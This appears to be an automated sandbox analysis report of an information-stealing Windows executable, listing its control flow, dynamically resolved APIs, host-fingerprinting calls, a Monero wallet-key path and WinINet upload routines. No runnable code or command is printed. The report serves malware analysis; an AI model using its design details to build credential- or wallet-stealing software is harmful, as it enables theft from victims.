15092 4c1cd1 15091->15092 15093 4ca8a0 lstrcpy 15092->15093 15094 4c1cda 15093->15094 15095 4ca9b0 4 API calls 15094->15095 15096 4c1cfb 15095->15096 15097 4ca8a0 lstrcpy 15096->15097 15098 4c1d04 15097->15098 15099 4c7850 3 API calls 15098->15099 15100 4c1d14 15099->15100 15101 4ca9b0 4 API calls 15100->15101 15102 4c1d24 15101->15102 15103 4ca8a0 lstrcpy 15102->15103 15104 4c1d2d 15103->15104 15105 4ca9b0 4 API calls 15104->15105 15106 4c1d4c 15105->15106 15107 4ca8a0 lstrcpy 15106->15107 15108 4c1d55 15107->15108 15109 4ca9b0 4 API calls 15108->15109 15110 4c1d75 15109->15110 15111 4ca8a0 lstrcpy 15110->15111 15112 4c1d7e 15111->15112 15113 4c78e0 3 API calls 15112->15113 15114 4c1d8e 15113->15114 15115 
4ca9b0 4 API calls 15114->15115 15116 4c1d9e 15115->15116 15117 4ca8a0 lstrcpy 15116->15117 15118 4c1da7 15117->15118 15119 4ca9b0 4 API calls 15118->15119 15120 4c1dc6 15119->15120 15121 4ca8a0 lstrcpy 15120->15121 15122 4c1dcf 15121->15122 15123 4ca9b0 4 API calls 15122->15123 15124 4c1df0 15123->15124 15125 4ca8a0 lstrcpy 15124->15125 15126 4c1df9 15125->15126 15785 4c7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15126->15785 15129 4ca9b0 4 API calls 15130 4c1e19 15129->15130 15131 4ca8a0 lstrcpy 15130->15131 15132 4c1e22 15131->15132 15133 4ca9b0 4 API calls 15132->15133 15134 4c1e41 15133->15134 15135 4ca8a0 lstrcpy 15134->15135 15136 4c1e4a 15135->15136 15137 4ca9b0 4 API calls 15136->15137 15138 4c1e6b 15137->15138 15139 4ca8a0 lstrcpy 15138->15139 15140 4c1e74 15139->15140 15787 4c7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15140->15787 15143 4ca9b0 4 API calls 15144 4c1e94 15143->15144 15145 4ca8a0 lstrcpy 15144->15145 15146 4c1e9d 15145->15146 15147 4ca9b0 4 API calls 15146->15147 15148 4c1ebc 15147->15148 15149 4ca8a0 lstrcpy 15148->15149 15150 4c1ec5 15149->15150 15151 4ca9b0 4 API calls 15150->15151 15152 4c1ee5 15151->15152 15153 4ca8a0 lstrcpy 15152->15153 15154 4c1eee 15153->15154 15790 4c7b00 GetUserDefaultLocaleName 15154->15790 15157 4ca9b0 4 API calls 15158 4c1f0e 15157->15158 15159 4ca8a0 lstrcpy 15158->15159 15160 4c1f17 15159->15160 15161 4ca9b0 4 API calls 15160->15161 15162 4c1f36 15161->15162 15163 4ca8a0 lstrcpy 15162->15163 15164 4c1f3f 15163->15164 15165 4ca9b0 4 API calls 15164->15165 15166 4c1f60 15165->15166 15167 4ca8a0 lstrcpy 15166->15167 15168 4c1f69 15167->15168 15794 4c7b90 15168->15794 15170 4c1f80 15171 4ca920 3 API calls 15170->15171 15172 4c1f93 15171->15172 15173 4ca8a0 lstrcpy 15172->15173 15174 4c1f9c 15173->15174 15175 4ca9b0 4 API calls 15174->15175 15176 4c1fc6 15175->15176 15177 4ca8a0 lstrcpy 15176->15177 15178 4c1fcf 15177->15178 15179 4ca9b0 4 API calls 15178->15179 15180 4c1fef 
15179->15180 15181 4ca8a0 lstrcpy 15180->15181 15182 4c1ff8 15181->15182 15806 4c7d80 GetSystemPowerStatus 15182->15806 15185 4ca9b0 4 API calls 15186 4c2018 15185->15186 15187 4ca8a0 lstrcpy 15186->15187 15188 4c2021 15187->15188 15189 4ca9b0 4 API calls 15188->15189 15190 4c2040 15189->15190 15191 4ca8a0 lstrcpy 15190->15191 15192 4c2049 15191->15192 15193 4ca9b0 4 API calls 15192->15193 15194 4c206a 15193->15194 15195 4ca8a0 lstrcpy 15194->15195 15196 4c2073 15195->15196 15197 4c207e GetCurrentProcessId 15196->15197 15808 4c9470 OpenProcess 15197->15808 15200 4ca920 3 API calls 15201 4c20a4 15200->15201 15202 4ca8a0 lstrcpy 15201->15202 15203 4c20ad 15202->15203 15204 4ca9b0 4 API calls 15203->15204 15205 4c20d7 15204->15205 15206 4ca8a0 lstrcpy 15205->15206 15207 4c20e0 15206->15207 15208 4ca9b0 4 API calls 15207->15208 15209 4c2100 15208->15209 15210 4ca8a0 lstrcpy 15209->15210 15211 4c2109 15210->15211 15813 4c7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15211->15813 15214 4ca9b0 4 API calls 15215 4c2129 15214->15215 15216 4ca8a0 lstrcpy 15215->15216 15217 4c2132 15216->15217 15218 4ca9b0 4 API calls 15217->15218 15219 4c2151 15218->15219 15220 4ca8a0 lstrcpy 15219->15220 15221 4c215a 15220->15221 15222 4ca9b0 4 API calls 15221->15222 15223 4c217b 15222->15223 15224 4ca8a0 lstrcpy 15223->15224 15225 4c2184 15224->15225 15817 4c7f60 15225->15817 15228 4ca9b0 4 API calls 15229 4c21a4 15228->15229 15230 4ca8a0 lstrcpy 15229->15230 15231 4c21ad 15230->15231 15232 4ca9b0 4 API calls 15231->15232 15233 4c21cc 15232->15233 15234 4ca8a0 lstrcpy 15233->15234 15235 4c21d5 15234->15235 15236 4ca9b0 4 API calls 15235->15236 15237 4c21f6 15236->15237 15238 4ca8a0 lstrcpy 15237->15238 15239 4c21ff 15238->15239 15830 4c7ed0 GetSystemInfo wsprintfA 15239->15830 15242 4ca9b0 4 API calls 15243 4c221f 15242->15243 15244 4ca8a0 lstrcpy 15243->15244 15245 4c2228 15244->15245 15246 4ca9b0 4 API calls 15245->15246 15247 4c2247 15246->15247 15248 4ca8a0 lstrcpy 15247->15248 

                              Control-flow Graph

                              APIs
                              • GetProcAddress.KERNEL32(76F70000,01180690), ref: 004C98A1
                              • GetProcAddress.KERNEL32(76F70000,01180630), ref: 004C98BA
                              • GetProcAddress.KERNEL32(76F70000,011806F0), ref: 004C98D2
                              • GetProcAddress.KERNEL32(76F70000,011807B0), ref: 004C98EA
                              • GetProcAddress.KERNEL32(76F70000,011806C0), ref: 004C9903
                              • GetProcAddress.KERNEL32(76F70000,011889D8), ref: 004C991B
                              • GetProcAddress.KERNEL32(76F70000,011767E0), ref: 004C9933
                              • GetProcAddress.KERNEL32(76F70000,011768E0), ref: 004C994C
                              • GetProcAddress.KERNEL32(76F70000,011806D8), ref: 004C9964
                              • GetProcAddress.KERNEL32(76F70000,01180720), ref: 004C997C
                              • GetProcAddress.KERNEL32(76F70000,01180750), ref: 004C9995
                              • GetProcAddress.KERNEL32(76F70000,01180768), ref: 004C99AD
                              • GetProcAddress.KERNEL32(76F70000,01176800), ref: 004C99C5
                              • GetProcAddress.KERNEL32(76F70000,01180780), ref: 004C99DE
                              • GetProcAddress.KERNEL32(76F70000,01180798), ref: 004C99F6
                              • GetProcAddress.KERNEL32(76F70000,01176640), ref: 004C9A0E
                              • GetProcAddress.KERNEL32(76F70000,011807C8), ref: 004C9A27
                              • GetProcAddress.KERNEL32(76F70000,01180810), ref: 004C9A3F
                              • GetProcAddress.KERNEL32(76F70000,01176940), ref: 004C9A57
                              • GetProcAddress.KERNEL32(76F70000,01180828), ref: 004C9A70
                              • GetProcAddress.KERNEL32(76F70000,01176600), ref: 004C9A88
                              • LoadLibraryA.KERNEL32(01180870,?,004C6A00), ref: 004C9A9A
                              • LoadLibraryA.KERNEL32(011808B8,?,004C6A00), ref: 004C9AAB
                              • LoadLibraryA.KERNEL32(01180888,?,004C6A00), ref: 004C9ABD
                              • LoadLibraryA.KERNEL32(011808A0,?,004C6A00), ref: 004C9ACF
                              • LoadLibraryA.KERNEL32(01180840,?,004C6A00), ref: 004C9AE0
                              • GetProcAddress.KERNEL32(76DA0000,01180858), ref: 004C9B02
                              • GetProcAddress.KERNEL32(75840000,011808D0), ref: 004C9B23
                              • GetProcAddress.KERNEL32(75840000,01188D78), ref: 004C9B3B
                              • GetProcAddress.KERNEL32(753A0000,01188C10), ref: 004C9B5D
                              • GetProcAddress.KERNEL32(77300000,011765E0), ref: 004C9B7E
                              • GetProcAddress.KERNEL32(774D0000,01188B48), ref: 004C9B9F
                              • GetProcAddress.KERNEL32(774D0000,NtQueryInformationProcess), ref: 004C9BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 004C9BAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: c54a9093c3465a910ac8d89b71ba74d361ca0f70734187b37c135351c89d2651
                              • Instruction ID: e8cdd657b795663acbd991c8536d8d10b282d7262f556408c5ae60560a67d918
                              • Opcode Fuzzy Hash: c54a9093c3465a910ac8d89b71ba74d361ca0f70734187b37c135351c89d2651
                              • Instruction Fuzzy Hash: 32A14BF9500201AFD344EFE9ED88EB637FBF748381704A61AE61DC3264D679A841CB52

                              Control-flow Graph

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004B460E
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 004B479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004B45C7, 004B45D2, 004B45DD, 004B45E8, 004B45F3, 004B4617, 004B4622, 004B462D, 004B4638, 004B4643, 004B4657, 004B4662, 004B466D, 004B4678, 004B4683, 004B46AC, 004B46B7, 004B46C2, 004B46CD, 004B46D8, 004B4713, 004B471E, 004B4729, 004B4734, 004B473F, 004B474F, 004B475A, 004B4765, 004B4770, 004B477B (the same filler sentence is referenced from all 30 sites)
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the same sentence, repeated and '$'-separated, once per xref listed above)
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: 837d40f133f6a6571f2ad7399ce1a4a568560429075f3f2279ad6b5a57f67104
                              • Instruction ID: d733b2e33822f61223967cacdcfb024c3ff6cdad93277e00a41dc5171ea61af8
                              • Opcode Fuzzy Hash: 837d40f133f6a6571f2ad7399ce1a4a568560429075f3f2279ad6b5a57f67104
                              • Instruction Fuzzy Hash: 6E41D364FC66046BCE6CB7A4886DF9DB65EDF5A701F605847BC04623C2CFF86620452B

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 801 4b4880-4b4942 call 4ca7a0 call 4b47b0 call 4ca740 * 5 InternetOpenA StrCmpCA 816 4b494b-4b494f 801->816 817 4b4944 801->817 818 4b4ecb-4b4ef3 InternetCloseHandle call 4caad0 call 4b9ac0 816->818 819 4b4955-4b4acd call 4c8b60 call 4ca920 call 4ca8a0 call 4ca800 * 2 call 4ca9b0 call 4ca8a0 call 4ca800 call 4ca9b0 call 4ca8a0 call 4ca800 call 4ca920 call 4ca8a0 call 4ca800 call 4ca9b0 call 4ca8a0 call 4ca800 call 4ca9b0 call 4ca8a0 call 4ca800 call 4ca9b0 call 4ca920 call 4ca8a0 call 4ca800 * 2 InternetConnectA 816->819 817->816 829 4b4f32-4b4fa2 call 4c8990 * 2 call 4ca7a0 call 4ca800 * 8 818->829 830 4b4ef5-4b4f2d call 4ca820 call 4ca9b0 call 4ca8a0 call 4ca800 818->830 819->818 905 4b4ad3-4b4ad7 819->905 830->829 906 4b4ad9-4b4ae3 905->906 907 4b4ae5 905->907 908 4b4aef-4b4b22 HttpOpenRequestA 906->908 907->908 909 4b4b28-4b4e28 call 4ca9b0 call 4ca8a0 call 4ca800 call 4ca920 call 4ca8a0 call 4ca800 call 4ca9b0 call 4ca8a0 call 4ca800 call 4ca9b0 call 4ca8a0 call 4ca800 call 4ca9b0 call 4ca8a0 call 4ca800 call 4ca9b0 call 4ca8a0 call 4ca800 call 4ca920 call 4ca8a0 call 4ca800 call 4ca9b0 call 4ca8a0 call 4ca800 call 4ca9b0 call 4ca8a0 call 4ca800 call 4ca920 call 4ca8a0 call 4ca800 call 4ca9b0 call 4ca8a0 call 4ca800 call 4ca9b0 call 4ca8a0 call 4ca800 call 4ca9b0 call 4ca8a0 call 4ca800 call 4ca9b0 call 4ca8a0 call 4ca800 call 4ca920 call 4ca8a0 call 4ca800 call 4ca740 call 4ca920 * 2 call 4ca8a0 call 4ca800 * 2 call 4caad0 lstrlen call 4caad0 * 2 lstrlen call 4caad0 HttpSendRequestA 908->909 910 4b4ebe-4b4ec5 InternetCloseHandle 908->910 1021 4b4e32-4b4e5c InternetReadFile 909->1021 910->818 1022 4b4e5e-4b4e65 1021->1022 1023 4b4e67-4b4eb9 InternetCloseHandle call 4ca800 1021->1023 1022->1023 1024 4b4e69-4b4ea7 call 4ca9b0 call 4ca8a0 call 4ca800 1022->1024 1023->910 1024->1021
                              APIs
                                • Part of subcall function 004CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 004CA7E6
                                • Part of subcall function 004B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004B4839
                                • Part of subcall function 004B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 004B4849
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004B4915
                              • StrCmpCA.SHLWAPI(?,0118E2D0), ref: 004B493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004B4ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,004D0DDB,00000000,?,?,00000000,?,",00000000,?,0118E210), ref: 004B4DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 004B4E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004B4E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004B4E49
                              • InternetCloseHandle.WININET(00000000), ref: 004B4EAD
                              • InternetCloseHandle.WININET(00000000), ref: 004B4EC5
                              • HttpOpenRequestA.WININET(00000000,0118E1D0,?,0118DA58,00000000,00000000,00400100,00000000), ref: 004B4B15
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                                • Part of subcall function 004CA920: lstrcpy.KERNEL32(00000000,?), ref: 004CA972
                                • Part of subcall function 004CA920: lstrcat.KERNEL32(00000000), ref: 004CA982
                              • InternetCloseHandle.WININET(00000000), ref: 004B4ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: 4a6d6e57a14ca556bce6701f105f79310248a3775e45a53e68d12b0d2cf16f5e
                              • Instruction ID: fc5b6618d389d8289f9c741224d7e097feb888c5a04052c4e65f9888f759a9e1
                              • Opcode Fuzzy Hash: 4a6d6e57a14ca556bce6701f105f79310248a3775e45a53e68d12b0d2cf16f5e
                              • Instruction Fuzzy Hash: F812E97591011CABDB54FB91DCA2FEEB339AF14308F5041AEB10662091DF782E59CB7A
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004B11B7), ref: 004C7880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C7887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 004C789F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: d9afba122bb956704d0e10e2d0b8e9ec02d20d22a61bd10e3cff8ad42c4c46db
                              • Instruction ID: 90f8ac01045d6828d02ec3262422562799b3a82d00309c1fc0d8c84673c51551
                              • Opcode Fuzzy Hash: d9afba122bb956704d0e10e2d0b8e9ec02d20d22a61bd10e3cff8ad42c4c46db
                              • Instruction Fuzzy Hash: D9F03CF5944208ABC700DFD9DD49FAABBB8EB04761F10025AEA15A2680C7B81904CBA2
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: e463317c8f1f3f11adc7e0006d424d4de637caaca645147fed02ab6b00609cbc
                              • Instruction ID: 87a9d40b6fbda0a38b26d286123935ea65d5d9caf2cd350d5f5e1e8071efaf5a
                              • Opcode Fuzzy Hash: e463317c8f1f3f11adc7e0006d424d4de637caaca645147fed02ab6b00609cbc
                              • Instruction Fuzzy Hash: B0D05EB890030CDBCB00EFE0D949AEDBB79FB0C311F001559D90972340EA306481CAA6

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 633 4c9c10-4c9c1a 634 4ca036-4ca0ca LoadLibraryA * 8 633->634 635 4c9c20-4ca031 GetProcAddress * 43 633->635 636 4ca0cc-4ca141 GetProcAddress * 5 634->636 637 4ca146-4ca14d 634->637 635->634 636->637 638 4ca216-4ca21d 637->638 639 4ca153-4ca211 GetProcAddress * 8 637->639 640 4ca21f-4ca293 GetProcAddress * 5 638->640 641 4ca298-4ca29f 638->641 639->638 640->641 642 4ca2a5-4ca332 GetProcAddress * 6 641->642 643 4ca337-4ca33e 641->643 642->643 644 4ca41f-4ca426 643->644 645 4ca344-4ca41a GetProcAddress * 9 643->645 646 4ca428-4ca49d GetProcAddress * 5 644->646 647 4ca4a2-4ca4a9 644->647 645->644 646->647 648 4ca4dc-4ca4e3 647->648 649 4ca4ab-4ca4d7 GetProcAddress * 2 647->649 650 4ca515-4ca51c 648->650 651 4ca4e5-4ca510 GetProcAddress * 2 648->651 649->648 652 4ca612-4ca619 650->652 653 4ca522-4ca60d GetProcAddress * 10 650->653 651->650 654 4ca67d-4ca684 652->654 655 4ca61b-4ca678 GetProcAddress * 4 652->655 653->652 656 4ca69e-4ca6a5 654->656 657 4ca686-4ca699 GetProcAddress 654->657 655->654 658 4ca708-4ca709 656->658 659 4ca6a7-4ca703 GetProcAddress * 4 656->659 657->656 659->658
                              APIs
                              • GetProcAddress.KERNEL32(76F70000,01176680), ref: 004C9C2D
                              • GetProcAddress.KERNEL32(76F70000,011766A0), ref: 004C9C45
                              • GetProcAddress.KERNEL32(76F70000,01188EC8), ref: 004C9C5E
                              • GetProcAddress.KERNEL32(76F70000,01188EE0), ref: 004C9C76
                              • GetProcAddress.KERNEL32(76F70000,0118C060), ref: 004C9C8E
                              • GetProcAddress.KERNEL32(76F70000,0118C210), ref: 004C9CA7
                              • GetProcAddress.KERNEL32(76F70000,0117B350), ref: 004C9CBF
                              • GetProcAddress.KERNEL32(76F70000,0118C180), ref: 004C9CD7
                              • GetProcAddress.KERNEL32(76F70000,0118C300), ref: 004C9CF0
                              • GetProcAddress.KERNEL32(76F70000,0118C168), ref: 004C9D08
                              • GetProcAddress.KERNEL32(76F70000,0118C078), ref: 004C9D20
                              • GetProcAddress.KERNEL32(76F70000,011766C0), ref: 004C9D39
                              • GetProcAddress.KERNEL32(76F70000,01176700), ref: 004C9D51
                              • GetProcAddress.KERNEL32(76F70000,01176720), ref: 004C9D69
                              • GetProcAddress.KERNEL32(76F70000,011767A0), ref: 004C9D82
                              • GetProcAddress.KERNEL32(76F70000,0118C0C0), ref: 004C9D9A
                              • GetProcAddress.KERNEL32(76F70000,0118C1C8), ref: 004C9DB2
                              • GetProcAddress.KERNEL32(76F70000,0117B148), ref: 004C9DCB
                              • GetProcAddress.KERNEL32(76F70000,01176740), ref: 004C9DE3
                              • GetProcAddress.KERNEL32(76F70000,0118C258), ref: 004C9DFB
                              • GetProcAddress.KERNEL32(76F70000,0118C240), ref: 004C9E14
                              • GetProcAddress.KERNEL32(76F70000,0118C2A0), ref: 004C9E2C
                              • GetProcAddress.KERNEL32(76F70000,0118C2E8), ref: 004C9E44
                              • GetProcAddress.KERNEL32(76F70000,01176760), ref: 004C9E5D
                              • GetProcAddress.KERNEL32(76F70000,0118C0D8), ref: 004C9E75
                              • GetProcAddress.KERNEL32(76F70000,0118C0F0), ref: 004C9E8D
                              • GetProcAddress.KERNEL32(76F70000,0118C150), ref: 004C9EA6
                              • GetProcAddress.KERNEL32(76F70000,0118C120), ref: 004C9EBE
                              • GetProcAddress.KERNEL32(76F70000,0118C090), ref: 004C9ED6
                              • GetProcAddress.KERNEL32(76F70000,0118C1E0), ref: 004C9EEF
                              • GetProcAddress.KERNEL32(76F70000,0118C0A8), ref: 004C9F07
                              • GetProcAddress.KERNEL32(76F70000,0118C108), ref: 004C9F1F
                              • GetProcAddress.KERNEL32(76F70000,0118C138), ref: 004C9F38
                              • GetProcAddress.KERNEL32(76F70000,0118CEC8), ref: 004C9F50
                              • GetProcAddress.KERNEL32(76F70000,0118C1F8), ref: 004C9F68
                              • GetProcAddress.KERNEL32(76F70000,0118C228), ref: 004C9F81
                              • GetProcAddress.KERNEL32(76F70000,01176780), ref: 004C9F99
                              • GetProcAddress.KERNEL32(76F70000,0118C2B8), ref: 004C9FB1
                              • GetProcAddress.KERNEL32(76F70000,011767C0), ref: 004C9FCA
                              • GetProcAddress.KERNEL32(76F70000,0118C2D0), ref: 004C9FE2
                              • GetProcAddress.KERNEL32(76F70000,0118C198), ref: 004C9FFA
                              • GetProcAddress.KERNEL32(76F70000,01176280), ref: 004CA013
                              • GetProcAddress.KERNEL32(76F70000,011762C0), ref: 004CA02B
                              • LoadLibraryA.KERNEL32(0118C1B0,?,004C5CA3,004D0AEB,?,?,?,?,?,?,?,?,?,?,004D0AEA,004D0AE3), ref: 004CA03D
                              • LoadLibraryA.KERNEL32(0118C270,?,004C5CA3,004D0AEB,?,?,?,?,?,?,?,?,?,?,004D0AEA,004D0AE3), ref: 004CA04E
                              • LoadLibraryA.KERNEL32(0118C288,?,004C5CA3,004D0AEB,?,?,?,?,?,?,?,?,?,?,004D0AEA,004D0AE3), ref: 004CA060
                              • LoadLibraryA.KERNEL32(0118C318,?,004C5CA3,004D0AEB,?,?,?,?,?,?,?,?,?,?,004D0AEA,004D0AE3), ref: 004CA072
                              • LoadLibraryA.KERNEL32(0118C030,?,004C5CA3,004D0AEB,?,?,?,?,?,?,?,?,?,?,004D0AEA,004D0AE3), ref: 004CA083
                              • LoadLibraryA.KERNEL32(0118C048,?,004C5CA3,004D0AEB,?,?,?,?,?,?,?,?,?,?,004D0AEA,004D0AE3), ref: 004CA095
                              • LoadLibraryA.KERNEL32(0118C618,?,004C5CA3,004D0AEB,?,?,?,?,?,?,?,?,?,?,004D0AEA,004D0AE3), ref: 004CA0A7
                              • LoadLibraryA.KERNEL32(0118C3C0,?,004C5CA3,004D0AEB,?,?,?,?,?,?,?,?,?,?,004D0AEA,004D0AE3), ref: 004CA0B8
                              • GetProcAddress.KERNEL32(75840000,011761E0), ref: 004CA0DA
                              • GetProcAddress.KERNEL32(75840000,0118C330), ref: 004CA0F2
                              • GetProcAddress.KERNEL32(75840000,01188AC8), ref: 004CA10A
                              • GetProcAddress.KERNEL32(75840000,0118C3D8), ref: 004CA123
                              • GetProcAddress.KERNEL32(75840000,01176460), ref: 004CA13B
